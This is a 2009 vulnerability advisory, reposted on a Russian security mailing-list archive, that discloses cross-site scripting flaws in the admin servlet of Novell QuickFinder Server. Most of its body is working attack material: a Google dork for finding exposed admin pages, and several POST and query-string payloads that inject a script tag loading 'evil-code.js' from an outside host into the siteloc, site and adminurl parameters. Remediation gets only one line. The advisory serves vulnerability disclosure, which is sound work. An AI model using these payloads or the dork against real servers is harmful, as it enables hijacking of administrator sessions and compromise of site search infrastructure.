Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA 1720-1] New TYPO3 packages fix several vulnerabilities

  Full Path Disclosure In Photolibrary 1.009

From:ivan.sanchez_(at)_nullcode.com.ar <ivan.sanchez_(at)_nullcode.com.ar>
Date:12 февраля 2009 г.
Subject:[Suspected Spam][Fwd: Re: Novell-QuickFinder Server Xss & Java remote execution Code]

                            NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+================================================================================
================================================+
+                 Novell-QuickFinder Server //Cross-site scripting (XSS) Remote Java Execution Code                              +
+================================================================================
================================================+


Author(s): Ivan Sanchez

http://www.novell.com/products/openenterpriseserver/quickfinder.html

Date: 10/02/2009


Overview
--------

If your company's Web site is like most, it's not lacking in information. While your site's visitors have access to massive amounts of data, they may benefit from a faster,
more efficient way to pinpoint what they're looking for: QuickFinder Server (formerly NetWare® Web Search) from Novell.

Unlike all-Web search engines, QuickFinder is targeted at the Enterprise. General Internet search engines index many Web sites and their component pages, but they either cannot or do not index all available content. Perhaps that's the reason more than 75 percent of Web-site visitors use site-specific search functionality when it's available to them. In fact, for many Web sites, the search-results page has more hits than does the home page.
Yet more than 50 percent of large Web sites (over 500,000 pages) and 70 percent of moderately sized Web sites (up to 5,000 pages) do not offer search functionality to their visitors.

"
Today I was checking a lot parameters,"POST" we have a lot of them to be exploited.
So I have posted some, but we have much more.
cheers !!! "

GOOGLE DORKS:
------------

Google Search: inurl:"/NSearch/AdminServlet"



Parameter Affected over http/https:
-----------------------------------




"add virtual server"

https://server:2200/qfsearch/AdminServlet?&req=displayaddsite

Post:
siteloc=%22%3E%3Cscript%20src=http://nullcode.com.ar/scripts/evil
-code.js%3E%3C/script%3E


"Default"

Post:
https://server:
2200/qfsearch/AdminServlet?site=globalsearchsite&req=generalproperties
site="><script src=http://www.nullcode.com.ar/scripts/evil-code.js></script>

"services, synchronization"

Post:
https://server:2200/qfsearch/AdminServlet?&req=clusterserviceproperties
site="><script src=http://www.nullcode.com.ar/scripts/evil-code.js></script>


Querystring:

https:
//server2200/qfsearch/AdminServlet?&req=global&adminurl="><scr
ipt src=http://www.nullcode.com.ar/scripts/evil-code.js></script>


Much more parameters have been affected.("print-list")



Remediation: Validate the Input.
------------





                        NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+================================================================================
================================================+
+                 Novell-QuickFinder Server //Cross-site scripting (XSS) Remote Java Execution Code                              +
+================================================================================
================================================+

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород